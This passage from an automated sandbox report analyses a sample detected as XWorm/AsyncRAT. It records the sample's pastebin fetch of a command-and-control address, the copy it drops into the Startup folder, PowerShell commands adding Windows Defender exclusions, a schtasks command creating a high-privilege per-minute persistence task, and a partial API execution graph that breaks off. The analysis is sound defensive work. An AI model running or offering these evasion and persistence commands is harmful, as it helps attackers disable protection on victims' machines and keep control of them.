                                Data Ascii: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                2024-10-13 17:11:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-10-13 17:11:05 UTC16384INData Raw: ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff e8 a4 25 fb e2 96 19 fa df 90 14 dc df 90 14 04 00 00 00 00 d4 78 00 3c d4 78 00 ff d4 78 00 ff d4 78 00 ff d6 7c 03 ff df 8f 13 ff e7 a2 23 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8 28 ff ea a8
                                Data Ascii: (((((((((((((((%x<xxx|#((((((((((((((((((((((((((((((((((((


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449831104.20.4.2354434320C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                TimestampBytes transferredDirectionData
                                2024-10-13 17:12:12 UTC74OUTGET /raw/LsuynkUz HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-13 17:12:12 UTC397INHTTP/1.1 200 OK
                                Date: Sun, 13 Oct 2024 17:12:12 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 252
                                Last-Modified: Sun, 13 Oct 2024 17:08:00 GMT
                                Server: cloudflare
                                CF-RAY: 8d20f407da775e68-EWR
                                2024-10-13 17:12:12 UTC26INData Raw: 31 34 0d 0a 31 39 33 2e 31 36 31 2e 31 39 33 2e 39 39 3a 34 36 30 37 30 0d 0a
                                Data Ascii: 14193.161.193.99:46070
                                2024-10-13 17:12:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:13:10:56
                                Start date:13/10/2024
                                Path:C:\Users\user\Desktop\80BvHOM51j.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\80BvHOM51j.exe"
                                Imagebase:0x7ff6ace80000
                                File size:43'520 bytes
                                MD5 hash:2D4B0911CBB27EA9EF26908F3CE841AD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:1
                                Start time:13:10:56
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:2
                                Start time:13:11:04
                                Start date:13/10/2024
                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe"
                                Imagebase:0xa00000
                                File size:174'080 bytes
                                MD5 hash:A9D1FD427561A90037A112B99EDD9D14
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: Joe Security
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 81%, ReversingLabs
                                • Detection: 66%, Virustotal, Browse
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:3
                                Start time:13:11:04
                                Start date:13/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "
                                Imagebase:0x7ff7c3930000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:13:11:04
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:13:11:04
                                Start date:13/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c cls
                                Imagebase:0x7ff7c3930000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:13:11:09
                                Start date:13/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:13:11:09
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:13:11:14
                                Start date:13/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "
                                Imagebase:0x7ff7c3930000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:13:11:14
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:13:11:17
                                Start date:13/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coonfart.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:13:11:17
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:16
                                Start time:13:11:23
                                Start date:13/10/2024
                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe"
                                Imagebase:0x410000
                                File size:174'080 bytes
                                MD5 hash:A9D1FD427561A90037A112B99EDD9D14
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:17
                                Start time:13:11:28
                                Start date:13/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:18
                                Start time:13:11:28
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:19
                                Start time:13:11:44
                                Start date:13/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:20
                                Start time:13:11:44
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:21
                                Start time:13:12:10
                                Start date:13/10/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker"
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:22
                                Start time:13:12:10
                                Start date:13/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:23
                                Start time:13:12:10
                                Start date:13/10/2024
                                Path:C:\Users\Public\Runtime Broker
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\Public\Runtime Broker"
                                Imagebase:0xf80000
                                File size:174'080 bytes
                                MD5 hash:A9D1FD427561A90037A112B99EDD9D14
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Runtime Broker, Author: Joe Security
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\Runtime Broker, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Runtime Broker, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 81%, ReversingLabs
                                • Detection: 66%, Virustotal, Browse
                                Has exited:true

                                General

                                Target ID:25
                                Start time:13:12:21
                                Start date:13/10/2024
                                Path:C:\Windows\System32\OpenWith.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                Imagebase:0x7ff684350000
                                File size:123'984 bytes
                                MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:26
                                Start time:13:12:22
                                Start date:13/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Imagebase:0x7ff6eef20000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:27
                                Start time:13:12:29
                                Start date:13/10/2024
                                Path:C:\Windows\System32\OpenWith.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                Imagebase:0x7ff684350000
                                File size:123'984 bytes
                                MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:25.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:27.3%
                                  Total number of Nodes:816
                                  Total number of Limit Nodes:7
                                  execution_graph 2415 7ff6ace84bb4 2416 7ff6ace84bc2 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2415->2416 2417 7ff6ace84bf2 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2416->2417 2418 7ff6ace84bfc 2416->2418 2417->2418 2423 7ff6ace839b0 2424 7ff6ace839c7 2423->2424 2425 7ff6ace839d2 2423->2425 2426 7ff6ace839d9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 2425->2426 2427 7ff6ace839e8 2425->2427 2426->2427 2428 7ff6ace83a0d memcpy 2427->2428 2430 7ff6ace83a42 2427->2430 2428->2430 2429 7ff6ace83ade 2430->2429 2431 7ff6ace83abe 2430->2431 2432 7ff6ace83a90 fread 2430->2432 2431->2429 2433 7ff6ace83ac3 fread 2431->2433 2432->2429 2432->2430 2433->2429 2434 7ff6ace841b0 2435 7ff6ace841c1 2434->2435 2441 7ff6ace841fe 2434->2441 2436 7ff6ace852c0 8 API calls 2435->2436 2437 7ff6ace841ca 2436->2437 2438 7ff6ace841f6 2437->2438 2439 7ff6ace84211 _invalid_parameter_noinfo_noreturn 2437->2439 2440 7ff6ace85af0 free 2438->2440 2440->2441 1797 7ff6ace85d1c 1798 7ff6ace85d35 1797->1798 1799 7ff6ace85d3d __scrt_acquire_startup_lock 1798->1799 1800 7ff6ace85e73 1798->1800 1802 7ff6ace85e7d 1799->1802 1808 7ff6ace85d5b __scrt_release_startup_lock 1799->1808 1840 7ff6ace863d8 IsProcessorFeaturePresent 1800->1840 1803 7ff6ace863d8 9 API calls 1802->1803 1804 7ff6ace85e88 1803->1804 1806 7ff6ace85e90 _exit 1804->1806 1805 7ff6ace85d80 1807 7ff6ace85e06 _get_initial_narrow_environment __p___argv __p___argc 1817 7ff6ace822f0 1807->1817 1808->1805 1808->1807 1811 7ff6ace85dfe _register_thread_local_exe_atexit_callback 1808->1811 1811->1807 1846 7ff6ace84e10 1817->1846 1820 7ff6ace8233a 1821 7ff6ace83524 _invalid_parameter_noinfo_noreturn 1820->1821 1822 7ff6ace82353 memset 1820->1822 1827 7ff6ace8239f 1820->1827 1854 7ff6ace85af8 1820->1854 1863 7ff6ace85af0 1820->1863 1823 7ff6ace8352b 1821->1823 1822->1820 1822->1821 1866 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 1823->1866 1827->1821 1841 7ff6ace863fe 1840->1841 1842 7ff6ace8640c memset RtlCaptureContext RtlLookupFunctionEntry 1841->1842 1843 7ff6ace86446 RtlVirtualUnwind 1842->1843 1844 7ff6ace86482 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1842->1844 1843->1844 1845 7ff6ace86502 1844->1845 1845->1802 1867 7ff6ace81290 _Query_perf_frequency _Query_perf_counter 1846->1867 1848 7ff6ace84e80 _Query_perf_frequency _Query_perf_counter 1849 7ff6ace84e2f 1848->1849 1849->1848 1850 7ff6ace84f61 1849->1850 1851 7ff6ace84f33 Sleep SleepEx 1849->1851 1852 7ff6ace84f22 Sleep 1849->1852 1850->1820 1851->1850 1852->1848 1855 7ff6ace85b12 malloc 1854->1855 1856 7ff6ace85b1c 1855->1856 1857 7ff6ace85b03 1855->1857 1856->1820 1857->1855 1858 7ff6ace85b22 1857->1858 1859 7ff6ace85b2d 1858->1859 1869 7ff6ace86294 1858->1869 1872 7ff6ace81110 1859->1872 1862 7ff6ace85b33 1864 7ff6ace8626c free 1863->1864 1868 7ff6ace812b8 1867->1868 1868->1849 1875 7ff6ace86274 1869->1875 1871 7ff6ace862a2 _CxxThrowException 1873 7ff6ace8111e Concurrency::cancel_current_task 1872->1873 1874 7ff6ace8112f __std_exception_copy 1873->1874 1874->1862 1875->1871 2442 7ff6ace85e98 2445 7ff6ace862b4 2442->2445 2446 7ff6ace85ea1 2445->2446 2447 7ff6ace862d7 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2445->2447 2447->2446 1876 7ff6ace82ca4 1972 7ff6ace84410 1876->1972 1878 7ff6ace82ca9 InternetOpenA 1879 7ff6ace82cd3 InternetOpenUrlA 1878->1879 1886 7ff6ace82db1 1878->1886 1880 7ff6ace82d1c HttpQueryInfoA 1879->1880 1881 7ff6ace82d0e InternetCloseHandle 1879->1881 1883 7ff6ace82d66 1880->1883 1884 7ff6ace82d52 InternetCloseHandle InternetCloseHandle 1880->1884 1881->1886 1882 7ff6ace82e0f SHGetFolderPathA 1890 7ff6ace831be SHGetFolderPathA 1882->1890 1896 7ff6ace82e89 1882->1896 1891 7ff6ace82d71 InternetReadFile InternetCloseHandle InternetCloseHandle 1883->1891 1884->1886 1885 7ff6ace82e0a 1889 7ff6ace85af0 free 1885->1889 1886->1882 1886->1885 1888 7ff6ace82e03 _invalid_parameter_noinfo_noreturn 1886->1888 1888->1885 1889->1882 1892 7ff6ace83510 1890->1892 1898 7ff6ace831e5 1890->1898 1891->1886 1893 7ff6ace85af0 free 1892->1893 1894 7ff6ace83518 1893->1894 2051 7ff6ace81520 system SetConsoleTitleW GetStdHandle 1894->2051 1895 7ff6ace8353c 2166 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 1895->2166 1896->1895 1901 7ff6ace82f28 memcpy 1896->1901 1916 7ff6ace82f5d 1896->1916 1897 7ff6ace8351d 2165 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 1897->2165 1898->1897 1903 7ff6ace83288 memcpy 1898->1903 1925 7ff6ace832bd 1898->1925 1902 7ff6ace82ff1 1901->1902 1996 7ff6ace84f80 1902->1996 1907 7ff6ace83362 1903->1907 1912 7ff6ace84f80 9 API calls 1907->1912 1909 7ff6ace82fc2 memcpy 1909->1902 1910 7ff6ace83530 1928 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 1910->1928 1919 7ff6ace83379 1912->1919 1913 7ff6ace85af8 std::_Facet_Register 3 API calls 1920 7ff6ace82f78 1913->1920 1915 7ff6ace82fba 1927 7ff6ace85af8 std::_Facet_Register 3 API calls 1915->1927 1916->1909 1916->1910 1916->1913 1916->1915 1917 7ff6ace832e4 memcpy 1917->1907 1918 7ff6ace8304d 2003 7ff6ace85060 1918->2003 1934 7ff6ace833be 1919->1934 1941 7ff6ace833b9 1919->1941 1945 7ff6ace833b2 _invalid_parameter_noinfo_noreturn 1919->1945 1935 7ff6ace82f7d 1920->1935 1936 7ff6ace82fb3 _invalid_parameter_noinfo_noreturn 1920->1936 1921 7ff6ace85af8 std::_Facet_Register 3 API calls 1930 7ff6ace832df 1921->1930 1925->1917 1925->1921 1926 7ff6ace8332f 1925->1926 1932 7ff6ace83536 1925->1932 1933 7ff6ace85af8 std::_Facet_Register 3 API calls 1926->1933 1927->1935 1928->1932 1929 7ff6ace83048 1938 7ff6ace85af0 free 1929->1938 1930->1917 1939 7ff6ace83328 _invalid_parameter_noinfo_noreturn 1930->1939 1943 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 1932->1943 1933->1917 1942 7ff6ace85060 5 API calls 1934->1942 1935->1909 1936->1915 1937 7ff6ace83041 _invalid_parameter_noinfo_noreturn 1937->1929 1938->1918 1939->1926 1946 7ff6ace85af0 free 1941->1946 1947 7ff6ace83418 1942->1947 1943->1895 1945->1941 1946->1934 1949 7ff6ace820d0 42 API calls 1947->1949 1951 7ff6ace8342f 1949->1951 1950 7ff6ace830be SetFileAttributesW 2037 7ff6ace84c30 1950->2037 1953 7ff6ace83433 SetFileAttributesW 1951->1953 1955 7ff6ace83468 1951->1955 1954 7ff6ace84c30 9 API calls 1953->1954 1954->1955 1956 7ff6ace834b2 1955->1956 1961 7ff6ace834ad 1955->1961 1965 7ff6ace834a6 _invalid_parameter_noinfo_noreturn 1955->1965 1956->1892 1967 7ff6ace8350b 1956->1967 1970 7ff6ace83504 _invalid_parameter_noinfo_noreturn 1956->1970 1957 7ff6ace830f3 1958 7ff6ace83138 1957->1958 1960 7ff6ace8313d 1957->1960 1962 7ff6ace83131 _invalid_parameter_noinfo_noreturn 1957->1962 1963 7ff6ace85af0 free 1958->1963 1959 7ff6ace8319b 1959->1890 1960->1959 1964 7ff6ace83196 1960->1964 1968 7ff6ace8318f _invalid_parameter_noinfo_noreturn 1960->1968 1966 7ff6ace85af0 free 1961->1966 1962->1958 1963->1960 1969 7ff6ace85af0 free 1964->1969 1965->1961 1966->1956 1971 7ff6ace85af0 free 1967->1971 1968->1964 1969->1959 1970->1967 1971->1892 1973 7ff6ace84440 1972->1973 1974 7ff6ace8445c 1973->1974 1975 7ff6ace84522 1973->1975 1976 7ff6ace84462 memcpy 1974->1976 1985 7ff6ace8447f 1974->1985 2167 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 1975->2167 1978 7ff6ace8450c 1976->1978 1978->1878 1979 7ff6ace8448b 1982 7ff6ace85af8 std::_Facet_Register 3 API calls 1979->1982 1980 7ff6ace84527 1983 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 1980->1983 1981 7ff6ace844ef memcpy 1981->1978 1986 7ff6ace844a1 1982->1986 1987 7ff6ace8452d 1983->1987 1984 7ff6ace844e7 1988 7ff6ace85af8 std::_Facet_Register 3 API calls 1984->1988 1985->1979 1985->1980 1985->1981 1985->1984 1989 7ff6ace844a6 1986->1989 1990 7ff6ace844e0 _invalid_parameter_noinfo_noreturn 1986->1990 1991 7ff6ace8458e ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 1987->1991 2168 7ff6ace84730 1987->2168 1988->1989 1989->1981 1990->1984 1993 7ff6ace845ab 1991->1993 1994 7ff6ace8459e 1991->1994 1993->1878 1995 7ff6ace85af0 free 1994->1995 1995->1993 1997 7ff6ace84fb0 1996->1997 1997->1997 1998 7ff6ace84fcc memcpy 1997->1998 1999 7ff6ace85002 1997->1999 2002 7ff6ace83008 1998->2002 2200 7ff6ace854c0 1999->2200 2002->1918 2002->1929 2002->1937 2004 7ff6ace8509f 2003->2004 2008 7ff6ace830a7 2003->2008 2005 7ff6ace85195 2004->2005 2009 7ff6ace850b5 2004->2009 2209 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2005->2209 2007 7ff6ace8519a 2011 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2007->2011 2018 7ff6ace820d0 GetModuleFileNameA 2008->2018 2009->2007 2009->2008 2010 7ff6ace8513f 2009->2010 2012 7ff6ace850f1 2009->2012 2014 7ff6ace85af8 std::_Facet_Register 3 API calls 2010->2014 2013 7ff6ace851a0 2011->2013 2015 7ff6ace85af8 std::_Facet_Register 3 API calls 2012->2015 2014->2008 2016 